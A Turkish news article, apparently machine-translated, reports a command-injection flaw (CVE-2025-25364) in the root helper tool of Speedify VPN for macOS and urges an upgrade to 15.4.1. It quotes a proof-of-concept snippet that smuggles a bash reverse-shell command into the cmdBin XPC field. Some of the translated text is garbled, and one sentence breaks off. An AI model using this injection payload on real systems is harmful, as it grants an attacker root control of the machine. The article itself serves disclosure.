MacOS’taki VPN Güvenlik Açığı Speedify kullanıcıları sistem devralmasına maruz bırakır


CVE-2025-25364 olarak izlenen macOS için Speedify VPN uygulamasında büyük bir güvenlik kusuru, milyonlarca kullanıcıyı tam sistem uzlaşma riskine maruz bıraktı.

Securelayer7’deki araştırmacılar, Speedify’ın ayrıcalıklı yardımcı aracındaki güvenlik açığını keşfettiler. Potansiyel olarak yerel saldırganların rasgele komutları kök olarak yürütmesine ve etkilenen sistemlerin tam kontrolünü almasına izin verebilir.

CVE-2025-25364: Kritik bir komut enjeksiyon güvenlik açığı

Sorunun kökü me.connectify.smjobblesshelper xpc hizmeti-Speedify için sistem düzeyinde ağ işlemlerini gerçekleştirmek için yüksek (kök) ayrıcalıklarla çalışan yardımcı bir araçtır.

– Reklamcılık –
Google Haberleri

/Library/privilegedhelpertools/me.connectify.smjobbleshelper üzerinden ayrıcalıklı bir arka planon olarak yüklenen bu hizmet, Apple’ın XPC mesajlaşma sistemi aracılığıyla ana Speedify uygulamasından komutları almak ve işlemek için yapılandırılmıştır.

Bakış açısıDetaylar
CVE kimliğiCVE-2025-25364
Etkilenen ürünVPN’yi hızlandır
Etkilenen versiyon15.0.0 (macOS)
Yamalı versiyon15.4.1
Bileşenme.connectify.smjobblesshelper (/kütüphane/ayrıcalıkta ayrıcalıklı yardımcı alet/)
Güvenlik Açığı TürüKomut enjeksiyonu

Gelen XPC mesajlarındaki özellikle CMDPATH ve CMDBIN alanlarının yanlış giriş doğrulaması nedeniyle, yerel bir saldırgan kötü niyetli bir yük oluşturabilir.

Bu alanlar, bir saldırganın rastgele kabuk komutları enjekte etmesini sağlayan, daha sonra yardımcı aracın kök ayrıcalıklarıyla yürüttüğü rastgele kabuk komutlarına enjekte etmesini sağlayan doğrudan komut yürütme mantığına gömülür.

Üç temel işlev bu güvenlik açığının merkezindedir:

  1. XPC Mesaj İşleyicisi: Gelen XPC mesajlarını kabul eder ve ayrıştırır, “RunSpeedify” isteği olanları giriş doğrulaması olmadan bir lansman işleyicisine yönlendirir.
  2. _Handlelaunchspeedifymsg: CMDPATH ve CMDBIN’i doğrudan girişten çıkarır ve program yürütmesini başlatır.
  3. _Runsystemcmd: Bu alanlardan bir kabuk komutu oluşturur ve System () ‘i yürütmek için çağırır. Bu çizgi enjeksiyon riskini göstermektedir:

rax = asprintf (& var_38, “codeSign -v -r = \” Sertifika Yaprağı[subject.CN] = \ ”%S \” ve çınlama elma jenerik \ ”\”%s \ ””, “…”, rcx);

Bir tehdit oyuncusu cmdbin veya cmdpath, harici bir sunucuya kök kabuk bağlantısı açmak için “;

Araştırmacılar, savunmasız yardımcısına bağlanmak ve hazırlanmış bir yük göndermek için XPC API’lerini kullanarak Objective-C’de yazılmış bir kavram kanıtı (POC) istismarı yayınladılar.

Yük, ters bir kabuk yumurtlama gibi kök olarak keyfi kod yürütmeyi tetikler. İşte ilgili bir snippet:

xpc_dictionary_set_string(message, "cmdPath", "/tmp");

const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";

xpc_dictionary_set_string(message, "cmdBin", injectionPayload);

Bu kusurun etkisi kritiktir: Yerel erişime sahip bir saldırgan tam kök kontrolü kazanabilir, hassas dosyaları değiştirebilir, kalıcı kötü amaçlı yazılım yükleyebilir ve verileri pess edebilir.

Çoğu Speedify VPN kullanıcıları gizlilik için uygulamaya güvendiğinden, bu güvenlik açığı geniş bir kullanıcı tabanının güvenliğini zayıflatabilir.

Speedify kullanıcılarına, tam bir yardımcı alet yeniden yazımı, daha katı giriş doğrulaması ve güvensiz XPC kullanımının kaldırılması ile kusuru ele alan 15.4.1 veya daha yüksek sürümlere yükseltmeleri şiddetle tavsiye edilir.

Olay, tüm ayrıcalıklı kodlarda titiz girdi validasyonunun en önemli önemini vurgulamaktadır.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!



Source link